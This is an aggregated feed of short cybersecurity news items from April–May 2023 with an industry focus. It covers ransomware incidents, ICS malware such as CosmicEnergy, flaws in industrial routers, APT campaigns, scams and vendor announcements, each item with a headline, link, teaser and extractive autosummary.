    height="315" class="aligncenter size-full wp-image-292324" /> ChatGPT hallucinations cause turbulence in court, a riot in Wales may have been ignited on social media, and do you think .MOV is a good top-level domain for "a website that moves you"? All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Mark Stockley. Plus don"t miss our featured interview with David Ahn of Centripetal. "

    Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Mark Stockley – @markstockley Episode links: Sponsored by: Bitwarden – Password security you can trust. "

    ---

    Top public cloud security concerns for the media and entertainment industry

    industry
    2023-05-29 https://www.helpnetsecurity.com/2023/05/29/media-and-entertainment-ndustry-cloud-storage/
    

    Media and entertainment (M&E) companies are rapidly turning to cloud storage in efforts to upgrade their security measures, according Wasabi. Survey findings highlighted that, while M&E organizations are still relatively new to cloud storage (69% of respondents had been using cloud storage for three years or less), public cloud storage use is on the rise, with 89% of respondents looking to increase (74%) or maintain (15%) their cloud services. Balancing budgets, security, and data loss … More →

    The post Top public cloud security concerns for the media and entertainment industry appeared first on Help Net Security.

    "

    Autosummary: The top three biggest security concerns M&E organizations have with public cloud include: Lack of native security services (42%) Lack of native backup, disaster and data protection tools and services (39%) Lack of experience with cloud platform or adequate security training (38%) “Organizations in the media and entertainment industry are flocking to cloud storage as their digital assets need to be stored securely, cost-effectively and accessed quickly,” said Whit Jackson, VP of Media and Entertainment at Wasabi. "

    ---

    Industrial automation giant ABB disclosed data breach after ransomware attack

    financial exploits ransomware industry
    2023-05-28 https://securityaffairs.com/146752/cyber-crime/abb-ransomware-attack.html
    

    Swiss electrification and automation technology giant ABB confirmed it has suffered a data breach after a ransomware attack. ABB has more than 105,000 employees and has $29.4 billion in revenue for 2022. On May 7, 2023, the Swiss multinational company, leading electrification and automation technology provider, suffered a cyber attack that reportedly impacted its business operations. […]

    The post Industrial automation giant ABB disclosed data breach after ransomware attack appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ABB) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids

    exploits industry
    2023-05-26 https://thehackernews.com/2023/05/new-cosmicenergy-malware-exploits-ics.html
    A new strain of malicious software that"s engineered to penetrate and disrupt critical systems in industrial environments has been unearthed. Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild. "The "

    Autosummary: "The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said. "

    ---

    New CosmicEnergy ICS malware threatens energy grid assets

    exploits industry
    2023-05-26 https://securityaffairs.com/146675/ics-scada/cosmicenergy-ics-malware.html
    

    Experts detailed a new piece of malware, named CosmicEnergy, that is linked to Russia and targets industrial control systems (ICS).  Researchers from Mandiant discovered a new malware, named CosmicEnergy, designed to target operational technology (OT) / industrial control system (ICS) systems. The malicious code was first uploaded to a public malware scanning service in December 2021 by […]

    The post New CosmicEnergy ICS malware threatens energy grid assets appeared first on Security Affairs.

    "

    Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ICS malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites

    industry
    2023-05-25 https://securityaffairs.com/146625/apt/iranian-tortoiseshell-israeli-logistics-industry.html
    

    Iran-linked threat actor Tortoiseshell targeted shipping, logistics, and financial services companies in Israel with watering hole attacks. ClearSky Cyber Security uncovered a watering hole attack on at least eight Israeli websites belonging to shipping, logistics, and financial services companies and attributed them with low confidence to the Iran-linked APT group Tortoiseshell (aka TA456 or Imperial […]

    The post Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites appeared first on Security Affairs.

    "

    Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Tortoiseshell) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code

    exploits ransomware industry
    2023-05-25 https://thehackernews.com/2023/05/buhti-ransomware-gang-switches-tactics.html
    The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn"t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a "

    Autosummary: "While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail"s general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said. "

    ---

    New Russian-linked CosmicEnergy malware targets industrial systems

    exploits industry rusia-ucrania
    2023-05-25 https://www.bleepingcomputer.com/news/security/new-russian-linked-cosmicenergy-malware-targets-industrial-systems/
    Mandiant security researchers have discovered a new OT known as CosmicEnergy that targets operational technology (OT), raising concerns about potential disruptions to electric power systems worldwide.  [...] "

    Autosummary: The list includes but is not limited to WhisperGate/WhisperKill, FoxBlade (aka HermeticWiper), SonicVote (aka HermeticRansom), CaddyWiper, DesertBlade, Industroyer2, Lasainraw (aka IsaacWiper), and FiberLake (aka DoubleZero). "

    ---

    Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry

    industry
    2023-05-25 https://thehackernews.com/2023/05/dark-frost-botnet-launches-devastating.html
    A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry. "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. Targets include "

    Autosummary: "The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News. "

    ---

    Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry

    industry
    2023-05-24 https://thehackernews.com/2023/05/iranian-tortoiseshell-hackers-targeting.html
    At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack. Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "The infected "

    Autosummary: Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "

    ---

    German arms manufacturer Rheinmetall suffered Black Basta ransomware attack

    exploits ransomware industry
    2023-05-23 https://securityaffairs.com/146571/cyber-crime/rheinmetall-black-basta-ransomware-attack.html
    

    The German automotive and arms manufacturer Rheinmetall announced it was victim of a Black Basta ransomware attack that took place last month. Rheinmetall is a German automotive and arms manufacturer that is listed on the Frankfurt stock exchange. The company this week announced it was victim of a ransomware attack conducted by the Black Basta ransomware group. The incident took place […]

    The post German arms manufacturer Rheinmetall suffered Black Basta ransomware attack appeared first on Security Affairs.

    "

    Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Balck Basta) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Exploring the tactics of phishing and scam websites in 2023

    financial industry
    2023-05-19 https://www.helpnetsecurity.com/2023/05/19/tactics-phishing-scam-websites-2023-video/
    

    Phishing scams pose an escalating danger as cybercriminals employ increasingly sophisticated techniques, rendering their detection and prevention more challenging. In this Help Net Security video, Abhilash Garimella, Head of Research at Bolster, talks about the evolution of phishing and scam websites in 2023.

    The post Exploring the tactics of phishing and scam websites in 2023 appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    NTT and Cisco help customers transition to IoT-as-a-Service model

    industry
    2023-05-19 https://www.helpnetsecurity.com/2023/05/19/ntt-and-cisco-help-customers-transition-to-iot-as-a-service-model/
    

    NTT and Cisco have announced a collaboration to develop and deploy joint solutions that empower organizations to improve operational efficiencies and advance sustainability goals. Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. The companies will deliver solutions that combine NTT’s Managed Services expertise, … More →

    The post NTT and Cisco help customers transition to IoT-as-a-Service model appeared first on Help Net Security.

    "

    Autosummary: Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. "

    ---

    Strata Identity unifies Maverics ID Orchestration functions across environments

    industry
    2023-05-19 https://www.helpnetsecurity.com/2023/05/19/strata-identity-id-orchestration/
    

    Strata Identity has unveiled the latest version of the Maverics platform that enables customers to unify ID Orchestration functions between legacy on-premises, modern cloud, and multi-vendor environments without rewriting their applications. With Maverics, businesses easily create a vendor-agnostic identity fabric through a visual management interface that supports any identity provider (IDP), including legacy on-premises systems and cloud systems from AWS, Azure, Okta and GCP. According to a Gartner report: “Orchestration through access management can be … More →

    The post Strata Identity unifies Maverics ID Orchestration functions across environments appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    How to Reduce Exposure on the Manufacturing Attack Surface

    industry
    2023-05-18 https://thehackernews.com/2023/05/how-to-reduce-exposure-on-manufacturing.html
    Digitalization initiatives are connecting once-isolated Operational Technology (OT) environments with their Information Technology (IT) counterparts. This digital transformation of the factory floor has accelerated the connection of machinery to digital systems and data. Computer systems for managing and monitoring digital systems and data have been added to the hardware and software used for "

    Autosummary: According to Security Scorecard, 48%, nearly half, of the manufacturing companies reviewed scored a C, D, or F in security.In fact, in 2022 alone, there were 2,337 security breaches of manufacturing systems, 338 with confirmed data disclosure (Verizon, 2022 DBIR Report).With minimal set up, requiring no agents or pre-installations, security and IT teams at manufacturing companies can safely challenge their complete attack surface to pinpoint the most damaging security gaps - just like a real-life attacker would. 5 — Benchmark Your Security Posture By continuously testing your attack surface at regular, frequent intervals, you can continuously benchmark your security posture. "

    ---

    Critics say £1bn for UK chip industry not enough

    industry
    2023-05-18 https://www.bbc.co.uk/news/technology-65633812?at_medium=RSS&at_campaign=KARANGA
    One CEO says the government"s semiconductor strategy does not address the needs of UK chipmakers. "

    Autosummary: "

    ---

    Monitoring the dark web to identify threats to energy sector organizations

    industry
    2023-05-17 https://securityaffairs.com/146357/deep-web/dark-web-initial-access-energy-sector-orgs.html
    

    Searchlight Cyber researchers warn of threat actors that are offering on the dark web access to energy sector organizations. Dark web intelligence firm Searchlight Cyber published a report that analyzes how threat actors in the dark web prepare their malicious operations against energy organizations. The threat actors use the hidden part of the web to […]

    The post Monitoring the dark web to identify threats to energy sector organizations appeared first on Security Affairs.

    "

    Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, dark web) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Threat actors auction initial access to remote software, RDP access, VPNs, and stolen credentials, allowing attacks to use these accesses to establish a foothold in the target organization and launch the attack on both IT and OT infrastructure. "

    ---

    Multiple flaws in Teltonika industrial cellular router expose OT networks to hack

    industry
    2023-05-17 https://securityaffairs.com/146317/hacking/teltonika-industrial-cellular-routers-flaws.html
    

    Experts found multiple vulnerabilities in Teltonika industrial cellular routers that could expose OT networks to cyber attacks. A joint analysis conducted by industrial cybersecurity firms Claroty and Otorio discovered multiple flaws in Teltonika Networks’ IIoT products that can expose OT networks to remote attacks. Teltonika Networks is a leading manufacturer of networking solutions, widely adopted […]

    The post Multiple flaws in Teltonika industrial cellular router expose OT networks to hack appeared first on Security Affairs.

    "

    Autosummary: Remote Management System (RMS): Versions prior to 4.14.0 (affected by CVE-2023-2586) RUT model routers: Version 00.07.00 through 00.07.03.4 (affected by CVE-2023-32349) RUT model routers: Version 00.07.00 through 00.07.03 (affected by CVE-2023-32350) “While hundreds of thousands of Teltonika devices are deployed worldwide, a search on internet-scanning engines such as Shodan and Censys also reveals thousands of internet-facing devices, with their management ports externally exposed to the internet.” concludes Otorio. "

    ---

    Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

    industry
    2023-05-15 https://thehackernews.com/2023/05/industrial-cellular-routers-at-risk-11.html
    Several security vulnerabilities have been disclosed in cloud management platforms associated with three industrial cellular router vendors that could expose operational technology (OT) networks to external attacks. The findings were presented by Israeli industrial cybersecurity firm OTORIO at the Black Hat Asia 2023 conference last week. "Industrial cellular routers and gateways are essential "

    Autosummary: " The six flaws impacting Teltonika Networks RMS – CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587, and CVE-2023-2588 – were discovered following a "comprehensive research" carried out in collaboration with Claroty. "

    ---

    Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app

    industry
    2023-05-12 https://www.malwarebytes.com/blog/news/2023/05/sponsored-twitter-post-goes-forex-trading-with-fake-bbc-site
    

    Categories: News Categories: Personal Tags: forex Tags: BBC Tags: fake Tags: trading Tags: digital Tags: reviews Tags: website Tags: AI Tags: app Tags: phone Tags: twitter Tags: sponsored Tags: ad Tags: advert Tags: blue check Tags: verified We take a look at a daisy chain of links and clicks leading from a sponsored Twitter ad to a fake BBC website offering up an AI trading app. (Read more...)

    The post Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app appeared first on Malwarebytes Labs.

    "

    Autosummary: The Tweet reads as follows: “Check out what benefits you can get if you are British” The Community Notes added to this tweet state: The link, via many redirects, goes to a fake BBC news page promoting an "automated trading platform" scam.If you click it, the site displays the following message: Dear client, In order to deposit funds to your trading account, your account manager will contact you via the phone in the following minutes, please be available to take the call.Plus, we also have the below almost identical review from another user: I have been using [the site] for several years now, and I have never had any issues with withdrawals or deposits. Clicking the link while using a VPN or the TOR browser, which places you outside the UK, results in an “advertorial” for an article promoting a UK-based immigration advice firm. Here’s a particularly odd review, considering the site is just a few months old: “I have been with them for several years now and have never experienced any issues. "

    ---

    Surprise! Coldplay lyrics hidden in Kingston SSD firmware

    industry
    2023-05-10 https://www.bleepingcomputer.com/news/technology/surprise-coldplay-lyrics-hidden-in-kingston-ssd-firmware/
    What has firmware got to do with pop rock, you ask? That"s the question that crossed a security researcher"s mind as he analyzed Kingston"s firmware and stumbled upon the lyrics of a popular Coldplay song buried deep within it. [...] "

    Autosummary: Kingston"s SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it"s what"s inside the ".bin" that you can"t unsee: Lyrics of Coldplay"s 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103. "

    ---

    Kingston"s SSD firmware has Coldplay lyrics hidden within it

    industry
    2023-05-10 https://www.bleepingcomputer.com/news/technology/kingstons-ssd-firmware-has-coldplay-lyrics-hidden-within-it/
    What has firmware got to do with pop rock, you ask? That"s the question that crossed a security researcher"s mind as he analyzed Kingston"s firmware and stumbled upon the lyrics of a popular Coldplay song buried deep within it. [...] "

    Autosummary: Kingston"s SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it"s what"s inside the ".bin" that you can"t unsee: Lyrics of Coldplay"s 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103. "

    ---

    Renewable energy projects worth billions stuck on hold

    industry
    2023-05-10 https://www.bbc.co.uk/news/science-environment-65500339?at_medium=RSS&at_campaign=KARANGA
    Major UK renewable energy projects being delayed by more than 10 years as grid reaches capacity. "

    Autosummary: "

    ---

    Lessons from a 40-year-long automotive OEM leader

    industry
    2023-05-08 https://www.helpnetsecurity.com/2023/05/08/paul-cha-lg-podcast/
    

    Paul Cha is a cyber and product security leader, serving as the VP of Cybersecurity at LG Electronics Vehicle component Solutions. Paul held critical positions at Synopsis, Ford Motor Company, and Samsung before joining LG. He found his way to cybersecurity while working on his Ph.D. in risk management. Paul started his career in cyber security work as a senior security solution development engineer, where he focused on smart appliances such as smart TVs and … More →

    The post Lessons from a 40-year-long automotive OEM leader appeared first on Help Net Security.

    "

    Autosummary: How struggling tier-one manufacturers can embed better security across their entire lifecycle As most manufacturers have complicated supply chain requirements and are moving toward software and cloud solutions, it becomes harder to handle complicated security issues. The main challenges faced by the product security industry The product security industry becomes more difficult as the world becomes more interconnected.As such, product security teams must continuously run TARA activities to enhance the quality of the product’s security. "

    ---

    Can a wind turbine handle hurricane speed winds?

    industry
    2023-05-08 https://www.bbc.co.uk/news/business-65261147?at_medium=RSS&at_campaign=KARANGA
    As wind farms expand into new areas they will need to withstand extreme wind speeds. "

    Autosummary: "

    ---

    Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry

    industry
    2023-05-06 https://thehackernews.com/2023/05/dragon-breath-apt-group-using-double.html
    An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism. "The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher "

    Autosummary: The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China. "

    ---

    AutoCrypt KEY provides the key management features needed for automotive production

    industry
    2023-05-05 https://www.helpnetsecurity.com/2023/05/05/autocrypt-key/
    

    AutoCrypt KEY enables OEMs and suppliers to manage all types of cryptographic keys used for the components of connected and electric vehicles. Modern vehicles function through communications, including internal communications between ECUs and application processors, and external connections with nearby vehicles, roadside infrastructure, mobile devices, and charging stations. To ensure that all transmitted data are safely encrypted and all connected components can be securely verified, the use of cryptographic keys is essential in establishing trust … More →

    The post AutoCrypt KEY provides the key management features needed for automotive production appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    New Android Malware "FluHorse" Targeting East Asian Markets with Deceptive Tactics

    exploits industry
    2023-05-05 https://thehackernews.com/2023/05/new-android-malware-fluhorse-targeting.html
    Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework. "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in "

    Autosummary: "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "

    ---

    Patch now! The Mirai IoT botnet is exploiting TP-Link routers

    exploits industry
    2023-05-04 https://www.tripwire.com/state-of-security/patch-now-mirai-iot-botnet-exploiting-tp-link-routers
    Businesses should patch their TP-Link routers as soon as possible, after the revelation that a legendary IoT botnet is targeting them for recruitment. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: "

    ---

    Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics

    exploits industry
    2023-05-03 https://thehackernews.com/2023/05/chinese-hacker-group-earth-longzhi.html
    A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO "

    Autosummary: A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. "

    ---

    Why the manufacturing sector needs stronger cyber defenses

    industry
    2023-05-02 https://www.helpnetsecurity.com/2023/05/02/manufacturing-sector-cyberattacks/
    

    In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. He delves into the far-reaching impact of cyberattacks on manufacturing companies, their supply chains, and the global economy. Additionally, Beato discusses the unique nature of cyber threats faced by the manufacturing industry and the challenges of implementing effective cybersecurity measures. How has … More →

    The post Why the manufacturing sector needs stronger cyber defenses appeared first on Help Net Security.

    "

    Autosummary: It contributes to global circular economies, such as consumer goods, electronics, automotive, energy, pharma, food and beverage, heavy industry and oil and gas.In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. Early this year, in January 2023, two new EU directives also entered into force: the NIS2, which replaced the previous directive on security of network and information systems, and the Critical Entities Resilience (CER) directive which repealed a 2008 directive on European critical infrastructure. "

    ---

    Vietnamese Threat Actor Infects 500,000 Devices Using "Malverposting" Tactics

    industry
    2023-05-01 https://thehackernews.com/2023/05/vietnamese-threat-actor-infects-500000.html
    A Vietnamese threat actor has been attributed as behind a "malverposting" campaign on social media platforms to infect over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer. Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious "

    Autosummary: "

    ---

    Overcoming industry obstacles for decentralized digital identities

    industry
    2023-04-26 https://www.helpnetsecurity.com/2023/04/26/eve-maler-forgerock-decentralized-digital-identities/
    

    In this Help Net Security interview, Eve Maler, CTO at ForgeRock, talks about how digital identities continue to play a critical role in how we access online services securely. Maler also highlights the challenges encountered by various industries in implementing decentralized digital identities. What challenges do decentralized digital identity systems face, and how can they be overcome? Decentralized identity is a nascent area, and we’re at an exciting moment in time where decentralized digital identities … More →

    The post Overcoming industry obstacles for decentralized digital identities appeared first on Help Net Security.

    "

    Autosummary: People will be able to get a credential one day – and then, the next day or week or year, be able to convincingly tell a service provider that they’ve already been proven to be old enough, or that they have a license to drive, or what have you.One of the strongest examples of implementation of decentralized digital identity systems is the mobile driver’s license (mDL) movement in the US for context, an mDL is a driver license (or ID card) stored in secure digital form on a mobile device with the capability to be queried in real time in a privacy-sensitive fashion. Third, ensure that the parts of the decentralized identity systems that have to do with security and privacy are robustly implemented, so that the promises made by decentralized identity today can be realized.Digital identity wallets attempt to decentralize identity information, that is, literally to put that data “on the edge” in the form of individuals’ wallets. "

    ---

    New coercive tactics used to extort ransomware payments

    exploits ransomware industry
    2023-04-26 https://www.helpnetsecurity.com/2023/04/26/q1-2023-ransomware-victims/
    

    The increase in reported ransomware victims across Q1 2023 reflects the continued prevalence of ransomware as a worldwide, industry agnostic threat, according to GuidePoint Security. The report is based on data obtained from publicly available resources, including threat groups themselves, and insight into the ransomware threat landscape. In the first quarter, GRIT tracked 849 total publicly posted ransomware victims claimed by 29 different threat groups. Increase in public ransomware victims GRIT’s latest report shows a … More →

    The post New coercive tactics used to extort ransomware payments appeared first on Help Net Security.

    "

    Autosummary: While manufacturing and technology continue to be the most impacted sectors, observed victims in the legal industry increased 65% from Q4 2022 to Q1 2023, from 23 to 38, with 70% consistently attributed to the most prolific “double-extortion” model ransomware groups – LockBit, AlphV, Royal, and BlackBasta. "

    ---

    NetRise raises $8 million to advance XIoT security technology

    industry
    2023-04-25 https://www.helpnetsecurity.com/2023/04/26/netrise-funding/
    

    NetRise announced $8 million in funding, led by Squadra Ventures, with participation by existing major investors Miramar Digital Ventures, Sorenson Ventures and DNX Ventures. NetRise has developed a cloud-based SaaS platform that analyzes and continuously monitors the firmware of Extended Internet of Things (XIoT) devices. Leading the market as a software supply chain detection & response platform, NetRise enables device manufacturers and enterprise customers to detect, respond to, and prevent threats throughout their supply chains. … More →

    The post NetRise raises $8 million to advance XIoT security technology appeared first on Help Net Security.

    "

    Autosummary: We have built our platform in such a way that support for automotive, networking equipment, consumer IoT, industrial control systems, and medical device firmware alike are all supported.” said Tom Pace, CEO of NetRise. "

    ---

    Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions

    industry
    2023-04-21 https://securityaffairs.com/145108/security/industrial-network-director-and-modeling-labs-critical-flaws.html
    

    Cisco released security updates to address critical security flaws in its Industrial Network Director and Modeling Labs solutions. Cisco released security updates to address critical security vulnerabilities in the Industrial Network Director and Modeling Labs solutions. An attacker can exploit these vulnerabilities to inject arbitrary operating system commands or access sensitive data. One of the […]

    The post Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISCO) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems

    government industry
    2023-04-19 https://thehackernews.com/2023/04/iranian-government-backed-hackers.html
    An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 to mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align "

    Autosummary: Drokbk was previously detailed by Secureworks Counter Threat Unit (CTU) in December 2022, attributing it to a threat actor known as Nemesis Kitten (aka Cobalt Mirage, TunnelVision, or UNC2448), a sub-cluster of Mint Sandstorm. "

    ---

    New Chameleon Android malware mimics bank, govt, and crypto apps

    financial exploits industry
    2023-04-17 https://www.bleepingcomputer.com/news/security/new-chameleon-android-malware-mimics-bank-govt-and-crypto-apps/
    A new Android trojan called "Chameleon" has been targeting users in Australia and Poland since the start of the year, mimicking the CoinSpot cryptocurrency exchange, an Australian government agency, and the IKO bank. [...] "

    Autosummary: Requesting permission to use the Accessibility Service (Cyble) At first connection with the C2, Chameleon sends the device version, model, root status, country, and precise location, probably to profile the new infection. "

    ---

    Snowflake Manufacturing Data Cloud improves supply chain performance

    industry
    2023-04-16 https://www.helpnetsecurity.com/2023/04/16/snowflake-manufacturing-data-cloud/
    

    Snowflake has launched the Manufacturing Data Cloud, which enables companies in automotive, technology, energy, and industrial sectors to unlock the value of their critical siloed industrial data by leveraging Snowflake’s data platform, Snowflake- and partner-delivered solutions, and industry-specific datasets. The Manufacturing Data Cloud empowers manufacturers to collaborate with partners, suppliers, and customers in a secure and scalable way, driving greater agility and visibility across the entire value chain. With Snowflake’s Manufacturing Data Cloud, organizations can … More →

    The post Snowflake Manufacturing Data Cloud improves supply chain performance appeared first on Help Net Security.

    "

    Autosummary: Powering smart manufacturing Native support for semi-structured, structured, and unstructured high-volume Internet of Things (IoT) data in Snowflake enables manufacturers to keep operations running remotely by streamlining operations within and across manufacturing plants, while also leveraging shop floor data in near real-time to predict maintenance needs, analyze cycle time, improve product yield and quality, and meet sustainability goals. "

    ---

    Daon brings IdentityX to healthcare industry

    industry
    2023-04-15 https://www.helpnetsecurity.com/2023/04/15/daon-expanding-identityx/
    

    Daon is expanding its IdentityX to the healthcare industry to enable organizations to safeguard identities for providers, staff, and patients. As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. Daon IdentityX provides identity proofing and authentication solutions for every touchpoint – patient care, medical … More →

    The post Daon brings IdentityX to healthcare industry appeared first on Help Net Security.

    "

    Autosummary: As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. "

    ---

    Tactics that make crypto giveaway scams so successful

    financial industry
    2023-04-14 https://www.helpnetsecurity.com/2023/04/14/tactics-crypto-giveaway-scams-video/
    

    The illicit market for crypto giveaway scams has expanded, offering various services to facilitate fraudulent activity. The proliferation of fake crypto giveaways can be attributed to the increased availability of tools for scammers, even those with limited technical skills. In this Help Net Security video, Tony Lauro, Director of Security Technology and Strategy at Akamai, discusses why crypto giveaway scams are so successful.

    The post Tactics that make crypto giveaway scams so successful appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Votiro collaborates with Sumo Logic to provide analytics on file-borne threats

    industry
    2023-04-14 https://www.helpnetsecurity.com/2023/04/15/votiro-collaborates-with-sumo-logic-to-provide-analytics-on-file-borne-threats/
    

    Votiro has integrated with Sumo Logic to enable reliable and secure cloud-native applications. Users can now send high-fidelity data and insights discovered by Votiro Cloud into the Sumo Logic Cloud SIEM console. Enterprises are relying on collaboration platforms, cloud workloads and storage environments more than ever before. File sharing and Cloud data usage will continue to expand, providing more opportunities for bad actors to penetrate enterprise networks through file-borne malware. Sumo Logic’s Cloud SIEM automatically … More →

    The post Votiro collaborates with Sumo Logic to provide analytics on file-borne threats appeared first on Help Net Security.

    "

